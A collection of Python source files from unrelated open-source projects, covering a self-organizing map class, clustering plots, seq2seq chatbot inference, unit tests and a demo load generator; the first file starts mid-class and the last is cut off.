if init_type == type_init.uniform_grid:
# Predefined weights in line with input data.
self._weights = [[[] for i in range(dim_info.get_dimensions())] for j in range(self._size)]
for i in range(self._size):
location = self._location[i]
for dim in range(dim_info.get_dimensions()):
if dim == 0:
if self._rows > 1:
self._weights[i][dim] = dim_info.get_minimum_coordinate()[dim] + step_x * location[dim]
else:
self._weights[i][dim] = dim_info.get_center()[dim]
elif dim == 1:
if self._cols > 1:
self._weights[i][dim] = dim_info.get_minimum_coordinate()[dim] + step_y * location[dim]
else:
self._weights[i][dim] = dim_info.get_center()[dim]
else:
self._weights[i][dim] = dim_info.get_center()[dim]
elif init_type == type_init.random_surface:
# Random weights at the full surface.
self._weights = [
[random.uniform(dim_info.get_minimum_coordinate()[i], dim_info.get_maximum_coordinate()[i]) for i in
range(dim_info.get_dimensions())] for _ in range(self._size)]
elif init_type == type_init.random_centroid:
# Random weights at the center of input data.
self._weights = [[(random.random() + dim_info.get_center()[i]) for i in range(dim_info.get_dimensions())]
for _ in range(self._size)]
else:
# Random weights of input data.
self._weights = [[random.random() for i in range(dim_info.get_dimensions())] for _ in range(self._size)]
def _create_connections(self, conn_type):
"""!
@brief Create connections in line with input rule (grid four, grid eight, honeycomb, function neighbour).
@param[in] conn_type (type_conn): Type of connection between oscillators in the network.
"""
self._neighbors = [[] for index in range(self._size)]
for index in range(0, self._size, 1):
upper_index = index - self._cols
upper_left_index = index - self._cols - 1
upper_right_index = index - self._cols + 1
lower_index = index + self._cols
lower_left_index = index + self._cols - 1
lower_right_index = index + self._cols + 1
left_index = index - 1
right_index = index + 1
node_row_index = math.floor(index / self._cols)
upper_row_index = node_row_index - 1
lower_row_index = node_row_index + 1
if (conn_type == type_conn.grid_eight) or (conn_type == type_conn.grid_four):
if upper_index >= 0:
self._neighbors[index].append(upper_index)
if lower_index < self._size:
self._neighbors[index].append(lower_index)
if (conn_type == type_conn.grid_eight) or (conn_type == type_conn.grid_four) or (
conn_type == type_conn.honeycomb):
if (left_index >= 0) and (math.floor(left_index / self._cols) == node_row_index):
self._neighbors[index].append(left_index)
if (right_index < self._size) and (math.floor(right_index / self._cols) == node_row_index):
self._neighbors[index].append(right_index)
if conn_type == type_conn.grid_eight:
if (upper_left_index >= 0) and (math.floor(upper_left_index / self._cols) == upper_row_index):
self._neighbors[index].append(upper_left_index)
if (upper_right_index >= 0) and (math.floor(upper_right_index / self._cols) == upper_row_index):
self._neighbors[index].append(upper_right_index)
if (lower_left_index < self._size) and (math.floor(lower_left_index / self._cols) == lower_row_index):
self._neighbors[index].append(lower_left_index)
if (lower_right_index < self._size) and (math.floor(lower_right_index / self._cols) == lower_row_index):
self._neighbors[index].append(lower_right_index)
if conn_type == type_conn.honeycomb:
if (node_row_index % 2) == 0:
upper_left_index = index - self._cols
upper_right_index = index - self._cols + 1
lower_left_index = index + self._cols
lower_right_index = index + self._cols + 1
else:
upper_left_index = index - self._cols - 1
upper_right_index = index - self._cols
lower_left_index = index + self._cols - 1
lower_right_index = index + self._cols
if (upper_left_index >= 0) and (math.floor(upper_left_index / self._cols) == upper_row_index):
self._neighbors[index].append(upper_left_index)
if (upper_right_index >= 0) and (math.floor(upper_right_index / self._cols) == upper_row_index):
self._neighbors[index].append(upper_right_index)
if (lower_left_index < self._size) and (math.floor(lower_left_index / self._cols) == lower_row_index):
self._neighbors[index].append(lower_left_index)
if (lower_right_index < self._size) and (math.floor(lower_right_index / self._cols) == lower_row_index):
self._neighbors[index].append(lower_right_index)
def _competition(self, x):
"""!
@brief Calculates neuron winner (distance, neuron index).
@param[in] x (list): Input pattern from the input data set, for example it can be coordinates of point.
@return (uint) Returns index of neuron that is winner.
"""
index = 0
minimum = euclidean_distance_square(self._weights[0], x)
for i in range(1, self._size, 1):
candidate = euclidean_distance_square(self._weights[i], x)
if candidate < minimum:
index = i
minimum = candidate
return index
def _adaptation(self, index, x):
"""!
@brief Change weight of neurons in line with won neuron.
@param[in] index (uint): Index of neuron-winner.
@param[in] x (list): Input pattern from the input data set.
"""
dimension = len(self._weights[0])
if self._conn_type == type_conn.func_neighbor:
for neuron_index in range(self._size):
distance = self._sqrt_distances[index][neuron_index]
if distance < self._local_radius:
influence = math.exp(-(distance / (2.0 * self._local_radius)))
for i in range(dimension):
self._weights[neuron_index][i] = self._weights[neuron_index][
i] + self._learn_rate * influence * (
x[i] - self._weights[neuron_index][i])
else:
for i in range(dimension):
self._weights[index][i] = self._weights[index][i] + self._learn_rate * (x[i] - self._weights[index][i])
for neighbor_index in self._neighbors[index]:
distance = self._sqrt_distances[index][neighbor_index]
if distance < self._local_radius:
influence = math.exp(-(distance / (2.0 * self._local_radius)))
for i in range(dimension):
self._weights[neighbor_index][i] = self._weights[neighbor_index][
i] + self._learn_rate * influence * (
x[i] - self._weights[neighbor_index][i])
def train(self, data, epochs, autostop=False):
"""!
@brief Trains self-organized feature map (SOM).
@param[in] data (list): Input data - list of points where each point is represented by list of features, for example coordinates.
@param[in] epochs (uint): Number of epochs for training.
@param[in] autostop (bool): Automatic termination of learning process when adaptation is not occurred.
@return (uint) Number of learning iterations.
"""
self._data = data
if self.__ccore_som_pointer is not None:
return wrapper.som_train(self.__ccore_som_pointer, data, epochs, autostop)
self._sqrt_distances = self.__initialize_distances(self._size, self._location)
for i in range(self._size):
self._award[i] = 0
self._capture_objects[i].clear()
# weights
self._create_initial_weights(self._params.init_type)
previous_weights = None
for epoch in range(1, epochs + 1):
# Depression term of coupling
self._local_radius = (self._params.init_radius * math.exp(-(epoch / epochs))) ** 2
self._learn_rate = self._params.init_learn_rate * math.exp(-(epoch / epochs))
# Clear statistics
if autostop:
for i in range(self._size):
self._award[i] = 0
self._capture_objects[i].clear()
for i in range(len(self._data)):
# Step 1: Competition:
index = self._competition(self._data[i])
# Step 2: Adaptation:
self._adaptation(index, self._data[i])
# Update statistics
if (autostop is True) or (epoch == epochs):
self._award[index] += 1
self._capture_objects[index].append(i)
# Check requirement of stopping
if autostop:
if previous_weights is not None:
maximal_adaptation = self._get_maximal_adaptation(previous_weights)
if maximal_adaptation < self._params.adaptation_threshold:
return epoch
previous_weights = [item[:] for item in self._weights]
return epochs
def simulate(self, input_pattern):
"""!
@brief Processes input pattern (no learining) and returns index of neuron-winner.
Using index of neuron winner catched object can be obtained using property capture_objects.
@param[in] input_pattern (list): Input pattern.
@return (uint) Returns index of neuron-winner.
@see capture_objects
"""
if self.__ccore_som_pointer is not None:
return wrapper.som_simulate(self.__ccore_som_pointer, input_pattern)
return self._competition(input_pattern)
def _get_maximal_adaptation(self, previous_weights):
"""!
@brief Calculates maximum changes of weight in line with comparison between previous weights and current weights.
@param[in] previous_weights (list): Weights from the previous step of learning process.
@return (double) Value that represents maximum changes of weight after adaptation process.
"""
dimension = len(self._data[0])
maximal_adaptation = 0.0
for neuron_index in range(self._size):
for dim in range(dimension):
current_adaptation = previous_weights[neuron_index][dim] - self._weights[neuron_index][dim]
if current_adaptation < 0:
current_adaptation = -current_adaptation
if maximal_adaptation < current_adaptation:
maximal_adaptation = current_adaptation
return maximal_adaptation
def get_winner_number(self):
"""!
@brief Calculates number of winner at the last step of learning process.
@return (uint) Number of winner.
"""
if self.__ccore_som_pointer is not None:
self._award = wrapper.som_get_awards(self.__ccore_som_pointer)
winner_number = 0
for i in range(self._size):
if self._award[i] > 0:
winner_number += 1
return winner_number
def show_distance_matrix(self):
"""!
@brief Shows gray visualization of U-matrix (distance matrix).
@see get_distance_matrix()
"""
distance_matrix = self.get_distance_matrix()
plt.imshow(distance_matrix, cmap=plt.get_cmap('hot'), interpolation='kaiser')
plt.title("U-Matrix")
plt.colorbar()
plt.show()
def get_distance_matrix(self):
"""!
@brief Calculates distance matrix (U-matrix).
@details The U-Matrix visualizes based on the distance in input space between a weight vector and its neighbors on map.
@return (list) Distance matrix (U-matrix).
@see show_distance_matrix()
@see get_density_matrix()
"""
if self.__ccore_som_pointer is not None:
self._weights = wrapper.som_get_weights(self.__ccore_som_pointer)
if self._conn_type != type_conn.func_neighbor:
self._neighbors = wrapper.som_get_neighbors(self.__ccore_som_pointer)
distance_matrix = [[0.0] * self._cols for i in range(self._rows)]
for i in range(self._rows):
for j in range(self._cols):
neuron_index = i * self._cols + j
if self._conn_type == type_conn.func_neighbor:
self._create_connections(type_conn.grid_eight)
for neighbor_index in self._neighbors[neuron_index]:
distance_matrix[i][j] += euclidean_distance_square(self._weights[neuron_index],
self._weights[neighbor_index])
distance_matrix[i][j] /= len(self._neighbors[neuron_index])
return distance_matrix
def show_density_matrix(self, surface_divider=20.0):
"""!
@brief Show density matrix (P-matrix) using kernel density estimation.
@param[in] surface_divider (double): Divider in each dimension that affect radius for density measurement.
@see show_distance_matrix()
"""
density_matrix = self.get_density_matrix(surface_divider)
plt.imshow(density_matrix, cmap=plt.get_cmap('hot'), interpolation='kaiser')
plt.title("P-Matrix")
plt.colorbar()
plt.show()
def get_density_matrix(self, surface_divider=20.0):
"""!
@brief Calculates density matrix (P-Matrix).
@param[in] surface_divider (double): Divider in each dimension that affect radius for density measurement.
@return (list) Density matrix (P-Matrix).
@see get_distance_matrix()
"""
if self.__ccore_som_pointer is not None:
self._weights = wrapper.som_get_weights(self.__ccore_som_pointer)
density_matrix = [[0] * self._cols for i in range(self._rows)]
dimension = len(self._weights[0])
dim_max = [float('-Inf')] * dimension
dim_min = [float('Inf')] * dimension
for weight in self._weights:
for index_dim in range(dimension):
if weight[index_dim] > dim_max[index_dim]:
dim_max[index_dim] = weight[index_dim]
if weight[index_dim] < dim_min[index_dim]:
dim_min[index_dim] = weight[index_dim]
radius = [0.0] * len(self._weights[0])
for index_dim in range(dimension):
radius[index_dim] = (dim_max[index_dim] - dim_min[index_dim]) / surface_divider
## TODO: do not use data
for point in self._data:
for index_neuron in range(len(self)):
point_covered = True
for index_dim in range(dimension):
if abs(point[index_dim] - self._weights[index_neuron][index_dim]) > radius[index_dim]:
point_covered = False
break
row = int(math.floor(index_neuron / self._cols))
col = index_neuron - row * self._cols
if point_covered is True:
density_matrix[row][col] += 1
return density_matrix
def show_winner_matrix(self):
"""!
@brief Show a winner matrix where each element corresponds to neuron and value represents
amount of won objects from input data-space at the last training iteration.
@see show_distance_matrix()
"""
if self.__ccore_som_pointer is not None:
self._award = wrapper.som_get_awards(self.__ccore_som_pointer)
(fig, ax) = plt.subplots()
winner_matrix = [[0] * self._cols for _ in range(self._rows)]
for i in range(self._rows):
for j in range(self._cols):
neuron_index = i * self._cols + j
winner_matrix[i][j] = self._award[neuron_index]
ax.text(i, j, str(winner_matrix[i][j]), va='center', ha='center')
ax.imshow(winner_matrix, cmap=plt.get_cmap('cool'), interpolation='none')
ax.grid(True)
plt.title("Winner Matrix")
plt.show()
plt.close(fig)
def show_network(self, awards=False, belongs=False, coupling=True, dataset=True, marker_type='o'):
"""!
@brief Shows neurons in the dimension of data.
@param[in] awards (bool): If True - displays how many objects won each neuron.
@param[in] belongs (bool): If True - marks each won object by according index of neuron-winner (only when
dataset is displayed too).
@param[in] coupling (bool): If True - displays connections between neurons (except case when function neighbor
is used).
@param[in] dataset (bool): If True - displays inputs data set.
@param[in] marker_type (string): Defines marker that is used to denote neurons on the plot.
"""
if self.__ccore_som_pointer is not None:
self._size = wrapper.som_get_size(self.__ccore_som_pointer)
self._weights = wrapper.som_get_weights(self.__ccore_som_pointer)
self._neighbors = wrapper.som_get_neighbors(self.__ccore_som_pointer)
self._award = wrapper.som_get_awards(self.__ccore_som_pointer)
dimension = len(self._weights[0])
fig = plt.figure()
# Check for dimensions
if (dimension == 1) or (dimension == 2):
axes = fig.add_subplot(111)
elif dimension == 3:
axes = fig.gca(projection='3d')
else:
raise NotImplementedError('Impossible to show network in data-space that is differ from 1D, 2D or 3D.')
if (self._data is not None) and (dataset is True):
for x in self._data:
if dimension == 1:
axes.plot(x[0], 0.0, 'b|', ms=30)
elif dimension == 2:
axes.plot(x[0], x[1], 'b.')
elif dimension == 3:
axes.scatter(x[0], x[1], x[2], c='b', marker='.')
# Show neurons
for index in range(self._size):
color = 'g'
if self._award[index] == 0:
color = 'y'
if dimension == 1:
axes.plot(self._weights[index][0], 0.0, color + marker_type)
if awards:
location = '{0}'.format(self._award[index])
axes.text(self._weights[index][0], 0.0, location, color='black', fontsize=10)
if belongs and self._data is not None:
location = '{0}'.format(index)
axes.text(self._weights[index][0], 0.0, location, color='black', fontsize=12)
for k in range(len(self._capture_objects[index])):
point = self._data[self._capture_objects[index][k]]
axes.text(point[0], 0.0, location, color='blue', fontsize=10)
if dimension == 2:
axes.plot(self._weights[index][0], self._weights[index][1], color + marker_type)
if awards:
location = '{0}'.format(self._award[index])
axes.text(self._weights[index][0], self._weights[index][1], location, color='black', fontsize=10)
if belongs and self._data is not None:
location = '{0}'.format(index)
axes.text(self._weights[index][0], self._weights[index][1], location, color='black', fontsize=12)
for k in range(len(self._capture_objects[index])):
point = self._data[self._capture_objects[index][k]]
axes.text(point[0], point[1], location, color='blue', fontsize=10)
if (self._conn_type != type_conn.func_neighbor) and (coupling is True):
for neighbor in self._neighbors[index]:
if neighbor > index:
axes.plot([self._weights[index][0], self._weights[neighbor][0]],
[self._weights[index][1], self._weights[neighbor][1]],
'g', linewidth=0.5)
elif dimension == 3:
axes.scatter(self._weights[index][0], self._weights[index][1], self._weights[index][2], c=color,
marker=marker_type)
if (self._conn_type != type_conn.func_neighbor) and (coupling != False):
for neighbor in self._neighbors[index]:
if neighbor > index:
axes.plot([self._weights[index][0], self._weights[neighbor][0]],
[self._weights[index][1], self._weights[neighbor][1]],
[self._weights[index][2], self._weights[neighbor][2]],
'g-', linewidth=0.5)
plt.title("Network Structure")
plt.grid()
plt.show()
plt.close(fig)
def __get_dump_from_python(self, ccore_usage):
return {'ccore': ccore_usage,
'state': {'cols': self._cols,
'rows': self._rows,
'size': self._size,
'conn_type': self._conn_type,
'neighbors': self._neighbors,
'local_radius': self._local_radius,
'learn_rate': self._learn_rate,
'params': self._params,
'location': self._location,
'weights': self._weights,
'award': self._award,
'capture_objects': self._capture_objects}}
def __download_dump_from_ccore(self):
self._location = self.__initialize_locations(self._rows, self._cols)
self._weights = wrapper.som_get_weights(self.__ccore_som_pointer)
self._award = wrapper.som_get_awards(self.__ccore_som_pointer)
self._capture_objects = wrapper.som_get_capture_objects(self.__ccore_som_pointer)
def __upload_common_part(self, state_dump):
self._cols = state_dump['cols']
self._rows = state_dump['rows']
self._size = state_dump['size']
self._conn_type = state_dump['conn_type']
self._neighbors = state_dump['neighbors']
self._local_radius = state_dump['local_radius']
self._learn_rate = state_dump['learn_rate']
self._params = state_dump['params']
self._neighbors = None
def __upload_dump_to_python(self, state_dump):
self.__ccore_som_pointer = None
self.__upload_common_part(state_dump)
self._location = state_dump['location']
self._weights = state_dump['weights']
self._award = state_dump['award']
self._capture_objects = state_dump['capture_objects']
self._location = self.__initialize_locations(self._rows, self._cols)
self._create_connections(self._conn_type)
def __upload_dump_to_ccore(self, state_dump):
self.__upload_common_part(state_dump)
self.__ccore_som_pointer = wrapper.som_create(self._rows, self._cols, self._conn_type, self._params)
wrapper.som_load(self.__ccore_som_pointer, state_dump['weights'], state_dump['award'],
state_dump['capture_objects'])
|
sktime/clustering/evaluation/_plot_clustering.py | marcio55afr/sktime | 5,349 | 21405 | # -*- coding: utf-8 -*-
"""Cluster plotting tools"""
__author__ = ["<NAME>", "<NAME>"]
__all__ = ["plot_cluster_algorithm"]
import pandas as pd
from sktime.clustering.base._typing import NumpyOrDF
from sktime.clustering.base.base import BaseClusterer
from sktime.clustering.partitioning._lloyds_partitioning import (
TimeSeriesLloydsPartitioning,
)
from sktime.datatypes._panel._convert import from_nested_to_2d_array
from sktime.utils.validation._dependencies import _check_soft_dependencies
def _plot(cluster_values, center, axes):
for cluster_series in cluster_values:
axes.plot(cluster_series, color="b")
axes.plot(center, color="r")
def plot_cluster_algorithm(model: BaseClusterer, predict_series: NumpyOrDF, k: int):
"""
Method that is used to plot a clustering algorithms output
Parameters
----------
model: BaseClusterer
Clustering model to plot
predict_series: Numpy or Dataframe
The series to predict the values for
k: int
Number of centers
"""
_check_soft_dependencies("matplotlib")
import matplotlib.pyplot as plt
import matplotlib.patches as mpatches
if isinstance(predict_series, pd.DataFrame):
predict_series = from_nested_to_2d_array(predict_series, return_numpy=True)
plt.figure(figsize=(5, 10))
plt.rcParams["figure.dpi"] = 100
indexes = model.predict(predict_series)
centers = model.get_centers()
series_values = TimeSeriesLloydsPartitioning.get_cluster_values(
indexes, predict_series, k
)
fig, axes = plt.subplots(nrows=k, ncols=1)
for i in range(k):
_plot(series_values[i], centers[i], axes[i])
blue_patch = mpatches.Patch(color="blue", label="Series that belong to the cluster")
red_patch = mpatches.Patch(color="red", label="Cluster centers")
plt.legend(
handles=[red_patch, blue_patch],
loc="upper center",
bbox_to_anchor=(0.5, -0.40),
fancybox=True,
shadow=True,
ncol=5,
)
plt.tight_layout()
plt.show()
|
pyramda/logic/any_pass.py | sergiors/pyramda | 124 | 21415 | <filename>pyramda/logic/any_pass.py
from pyramda.function.curry import curry
from pyramda.function.always import always
from pyramda.iterable.reduce import reduce
from .either import either
@curry
def any_pass(ps, v):
return reduce(either, always(False), ps)(v)
|
test/unit/test_params.py | davvil/sockeye | 1,117 | 21448 | <reponame>davvil/sockeye<gh_stars>1000+
# Copyright 2017--2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may not
# use this file except in compliance with the License. A copy of the License
# is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is distributed on
# an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
import itertools
import glob
import os.path
import tempfile
import mxnet as mx
import pytest
import sockeye.encoder
import sockeye.model
import sockeye.training
import sockeye.constants as C
def test_cleanup_param_files():
with tempfile.TemporaryDirectory() as tmp_dir:
for n in itertools.chain(range(1, 20, 2), range(21, 41)):
# Create empty files
open(os.path.join(tmp_dir, C.PARAMS_NAME % n), "w").close()
sockeye.training.cleanup_params_files(tmp_dir, 5, 40, 17, False, 8, "perplexity", "best")
expectedSurviving = set([os.path.join(tmp_dir, C.PARAMS_NAME % n)
for n in [17, 36, 37, 38, 39, 40]])
# 17 must survive because it is the best one
assert set(glob.glob(os.path.join(tmp_dir, C.PARAMS_PREFIX + "*"))) == expectedSurviving
def test_cleanup_param_files_keep_first():
with tempfile.TemporaryDirectory() as tmp_dir:
for n in itertools.chain(range(0, 20, 2), range(21, 41)):
# Create empty files
open(os.path.join(tmp_dir, C.PARAMS_NAME % n), "w").close()
sockeye.training.cleanup_params_files(tmp_dir, 5, 40, 16, True, 8, "perplexity", "best")
expectedSurviving = set([os.path.join(tmp_dir, C.PARAMS_NAME % n)
for n in [0, 16, 36, 37, 38, 39, 40]])
# 16 must survive because it is the best one
# 0 should also survive because we set keep_first to True
assert set(glob.glob(os.path.join(tmp_dir, C.PARAMS_PREFIX + "*"))) == expectedSurviving
def mock_model():
config_embed = sockeye.encoder.EmbeddingConfig(vocab_size=20, num_embed=4, dropout=0.0)
config_encoder = sockeye.encoder.EncoderConfig(model_size=4, attention_heads=1, feed_forward_num_hidden=4,
act_type='relu', num_layers=1, dropout_attention=0.0,
dropout_act=0.0, dropout_prepost=0.0,
positional_embedding_type='fixed', preprocess_sequence='none',
postprocess_sequence='none', max_seq_len_source=30,
max_seq_len_target=30)
config = sockeye.model.ModelConfig(config_data=None, vocab_source_size=20, vocab_target_size=20,
config_embed_source=config_embed, config_embed_target=config_embed,
config_encoder=config_encoder, config_decoder=config_encoder)
model = sockeye.model.SockeyeModel(config=config)
return model
def test_set_parameters():
model = mock_model()
model.initialize(init='xavier', ctx=mx.cpu(0))
p = mx.gluon.Parameter('source_target_embed_weight', shape=(20, 4))
p.initialize(init='xavier', ctx=mx.cpu(0))
model.set_parameters({'source_target_embed_weight': p})
assert mx.test_utils.same(model.params['source_target_embed_weight'].data(), p.data())
def test_set_parameters_allow_missing():
model = mock_model()
model.initialize(init='xavier', ctx=mx.cpu(0))
model.set_parameters({}, allow_missing=True)
assert 'source_target_embed_weight' in model.params
with pytest.raises(AssertionError) as e:
model.set_parameters({}, allow_missing=False)
assert str(e.value) == "Parameter 'source_target_embed_weight' is missing in new_params dictionary. " \
"Set allow_missing=True to ignore missing parameters."
def test_set_parameters_ignore_extra():
model = mock_model()
model.initialize(init='xavier', ctx=mx.cpu(0))
p = mx.gluon.Parameter('source_target_embed_weight', shape=(20, 4))
p.initialize(init='xavier', ctx=mx.cpu(0))
q = mx.gluon.Parameter('q', shape=(1, 1))
q.initialize(init='xavier', ctx=mx.cpu(0))
params = {'source_target_embed_weight': p, 'q': q}
model.set_parameters(params, ignore_extra=True)
assert 'source_target_embed_weight' in model.params
assert 'q' not in model.params
with pytest.raises(ValueError) as e:
model.set_parameters(params, ignore_extra=False)
assert str(e.value) == "Parameter 'q' in new_params dictionary is not preset in ParameterDict. " \
"Set ignore_extra=True to ignore."
def test_set_parameters_context():
model = mock_model()
model.initialize(init='xavier', ctx=[mx.cpu(0), mx.cpu(1)])
p = mx.gluon.Parameter('source_target_embed_weight', shape=(20, 4))
p.initialize(init='xavier', ctx=mx.cpu(2))
model.set_parameters({'source_target_embed_weight': p})
for i in range(2):
assert mx.test_utils.same(model.params['source_target_embed_weight'].data(mx.cpu(i)), p.data(mx.cpu(2)))
def test_set_parameters_shape():
model = mock_model()
model.initialize(init='xavier', ctx=mx.cpu(0))
p = mx.gluon.Parameter('source_target_embed_weight', shape=(10, 10))
p.initialize(init='xavier', ctx=mx.cpu(0))
with pytest.raises(AssertionError) as e:
model.set_parameters({'source_target_embed_weight': p})
assert str(e.value) == "Parameter 'source_target_embed_weight' has shape '(20, 4)' in the model but shape " \
"'(10, 10)' in the new_params dictionary."
def test_set_parameters_uninitialized():
model = mock_model()
model.initialize(init='xavier', ctx=mx.cpu(0))
p = mx.gluon.Parameter('source_target_embed_weight', shape=(20, 4))
with pytest.raises(AssertionError) as e:
model.set_parameters({'source_target_embed_weight': p})
assert str(e.value) == "Parameter 'source_target_embed_weight' is not initialized in new_params dictionary."
p.initialize(init='xavier', ctx=mx.cpu(0))
model = mock_model()
with pytest.raises(AssertionError) as e:
model.set_parameters({'source_target_embed_weight': p})
assert str(e.value) == "Parameter 'source_target_embed_weight' must be initialized before it can be reset using " \
"set_parameters."
|
examples/python/django/load-generator.py | ScriptBox99/pyroscope | 5,751 | 21458 | import random
import requests
import time
HOSTS = [
'us-east-1',
'us-west-1',
'eu-west-1',
]
VEHICLES = [
'bike',
'scooter',
'car',
]
if __name__ == "__main__":
print(f"starting load generator")
time.sleep(15)
print('done sleeping')
while True:
host = HOSTS[random.randint(0, len(HOSTS) - 1)]
vehicle = VEHICLES[random.randint(0, len(VEHICLES) - 1)]
print(f"requesting {vehicle} from {host}")
resp = requests.get(f'http://web:8000/{vehicle}')
print(f"received {resp}")
time.sleep(random.uniform(0.2, 0.4))
|
rnn/chatbot/chatbot.py | llichengtong/yx4 | 128 | 21467 | # coding=utf8
import logging
import os
import random
import re
import numpy as np
import tensorflow as tf
from seq2seq_conversation_model import seq2seq_model
from seq2seq_conversation_model import data_utils
from seq2seq_conversation_model import tokenizer
from seq2seq_conversation_model.seq2seq_conversation_model import FLAGS, _buckets
from settings import SEQ2SEQ_MODEL_DIR
_LOGGER = logging.getLogger('track')
UNK_TOKEN_REPLACEMENT = [
'?',
'我不知道你在说什么',
'什么鬼。。。',
'宝宝不知道你在说什么呐。。。',
]
ENGLISHWORD_PATTERN = re.compile(r'[a-zA-Z0-9]')
def is_unichar_englishnum(char):
return ENGLISHWORD_PATTERN.match(char)
def trim(s):
"""
1. delete every space between chinese words
2. suppress extra spaces
:param s: some python string
:return: the trimmed string
"""
if not (isinstance(s, unicode) or isinstance(s, str)):
return s
unistr = s.decode('utf8') if type(s) != unicode else s
unistr = unistr.strip()
if not unistr:
return ''
trimmed_str = []
if unistr[0] != ' ':
trimmed_str.append(unistr[0])
for ind in xrange(1, len(unistr) - 1):
prev_char = unistr[ind - 1] if len(trimmed_str) == 0 else trimmed_str[-1]
cur_char = unistr[ind]
maybe_trim = cur_char == ' '
next_char = unistr[ind + 1]
if not maybe_trim:
trimmed_str.append(cur_char)
else:
if is_unichar_englishnum(prev_char) and is_unichar_englishnum(next_char):
trimmed_str.append(cur_char)
else:
continue
if unistr[-1] != ' ':
trimmed_str.append(unistr[-1])
return ''.join(trimmed_str)
class Chatbot():
"""
answer an enquiry using trained seq2seq model
"""
def __init__(self, model_dir):
# Create model and load parameters.
self.session = tf.InteractiveSession()
self.model = self.create_model(self.session, model_dir, True)
self.model.batch_size = 1
# Load vocabularies.
vocab_path = os.path.join(FLAGS.data_dir, "vocab%d" % FLAGS.vocab_size)
self.vocab, self.rev_vocab = data_utils.initialize_vocabulary(vocab_path)
def create_model(self, session, model_dir, forward_only):
"""Create conversation model and initialize or load parameters in session."""
model = seq2seq_model.Seq2SeqModel(
FLAGS.vocab_size, FLAGS.vocab_size, _buckets,
FLAGS.size, FLAGS.num_layers, FLAGS.max_gradient_norm,
FLAGS.batch_size,
FLAGS.learning_rate, FLAGS.learning_rate_decay_factor,
use_lstm=FLAGS.use_lstm,
forward_only=forward_only)
ckpt = tf.train.get_checkpoint_state(model_dir)
if ckpt and tf.train.checkpoint_exists(ckpt.model_checkpoint_path):
_LOGGER.info("Reading model parameters from %s" % ckpt.model_checkpoint_path)
model.saver.restore(session, ckpt.model_checkpoint_path)
_LOGGER.info("Read model parameter succeed!")
else:
raise ValueError(
"Failed to find legal model checkpoint files in %s" % model_dir)
return model
def generate_answer(self, enquiry):
# Get token-ids for the input sentence.
token_ids = data_utils.sentence_to_token_ids(enquiry, self.vocab, tokenizer.fmm_tokenizer)
if len(token_ids) == 0:
_LOGGER.error('lens of token ids of sentence %s is 0' % enquiry)
# Which bucket does it belong to?
bucket_id = min([b for b in xrange(len(_buckets))
if _buckets[b][0] > len(token_ids)])
# Get a 1-element batch to feed the sentence to the model.
encoder_inputs, decoder_inputs, target_weights = self.model.get_batch(
{bucket_id: [(token_ids, [])]}, bucket_id)
# Get output logits for the sentence.
_, _, output_logits = self.model.step(self.session, encoder_inputs,
decoder_inputs,
target_weights, bucket_id, True)
# This is a greedy decoder - outputs are just argmaxes of output_logits.
outputs = [int(np.argmax(logit, axis=1)) for logit in output_logits]
# If there is an EOS symbol in outputs, cut them at that point.
if tokenizer.EOS_ID in outputs:
outputs = outputs[:outputs.index(tokenizer.EOS_ID)]
# Print out response sentence corresponding to outputs.
answer = " ".join([self.rev_vocab[output] for output in outputs])
if tokenizer._UNK in answer:
answer = random.choice(UNK_TOKEN_REPLACEMENT)
answer = trim(answer)
return answer
def close(self):
self.session.close()
if __name__ == "__main__":
m = Chatbot(SEQ2SEQ_MODEL_DIR + '/train/')
response = m.generate_answer(u'我知道你不知道我知道你不知道我说的是什么意思')
print response
|
app/services/articles.py | StanislavRud/api-realword-app-test | 1,875 | 21477 | <filename>app/services/articles.py<gh_stars>1000+
from slugify import slugify
from app.db.errors import EntityDoesNotExist
from app.db.repositories.articles import ArticlesRepository
from app.models.domain.articles import Article
from app.models.domain.users import User
async def check_article_exists(articles_repo: ArticlesRepository, slug: str) -> bool:
try:
await articles_repo.get_article_by_slug(slug=slug)
except EntityDoesNotExist:
return False
return True
def get_slug_for_article(title: str) -> str:
return slugify(title)
def check_user_can_modify_article(article: Article, user: User) -> bool:
return article.author.username == user.username
|
tests/unit/schemas/test_base_schema_class.py | gamechanger/dusty | 421 | 21524 | from unittest import TestCase
from schemer import Schema, Array, ValidationException
from dusty.schemas.base_schema_class import DustySchema, DustySpecs
from ...testcases import DustyTestCase
class TestDustySchemaClass(TestCase):
def setUp(self):
self.base_schema = Schema({'street': {'type': basestring},
'house_number': {'type': int, 'default': 1}})
self.bigger_schema = Schema({'address': {'type': self.base_schema, 'default': {}},
'first_name': {'type': basestring, 'required': True},
'last_name': {'type': basestring, 'default': 'johnson'}})
def test_init_invalid_doc(self):
doc = {'street': 'dogstoon',
'house_number': '1'}
with self.assertRaises(ValidationException):
DustySchema(self.base_schema, doc)
def test_valid_doc(self):
doc = {'street': 'dogstoon',
'house_number': 1}
dusty_schema = DustySchema(self.base_schema, doc)
self.assertEquals(dusty_schema['street'], 'dogstoon')
self.assertEquals(dusty_schema['house_number'], 1)
def test_setting_defaults(self):
doc = {'street': 'dogstoon'}
dusty_schema = DustySchema(self.base_schema, doc)
self.assertEquals(dusty_schema['street'], 'dogstoon')
self.assertEquals(dusty_schema['house_number'], 1)
def test_setting_defaults_more_complicated_1(self):
doc = {'first_name': 'dusty'}
dusty_schema = DustySchema(self.bigger_schema, doc)
self.assertEquals(dusty_schema['first_name'], 'dusty')
self.assertEquals(dusty_schema['last_name'], 'johnson')
self.assertEquals(dusty_schema['address'], {'house_number': 1})
def test_setting_defaults_more_complicated_2(self):
doc = {'first_name': 'dusty',
'address': {'street': 'dogstoon'}}
dusty_schema = DustySchema(self.bigger_schema, doc)
self.assertEquals(dusty_schema['address']['street'], 'dogstoon')
self.assertEquals(dusty_schema['address']['house_number'], 1)
def test_in_1(self):
doc = {'first_name': 'dusty',
'address': {'street': 'dogstoon'}}
dusty_schema = DustySchema(self.bigger_schema, doc)
self.assertTrue('first_name' in dusty_schema)
def test_in_2(self):
doc = {'first_name': 'dusty',
'address': {'street': 'dogstoon'}}
dusty_schema = DustySchema(self.bigger_schema, doc)
self.assertFalse('first_names' in dusty_schema)
def test_keys(self):
doc = {'street': 'dogstoon',
'house_number': 1}
dusty_schema = DustySchema(self.base_schema, doc)
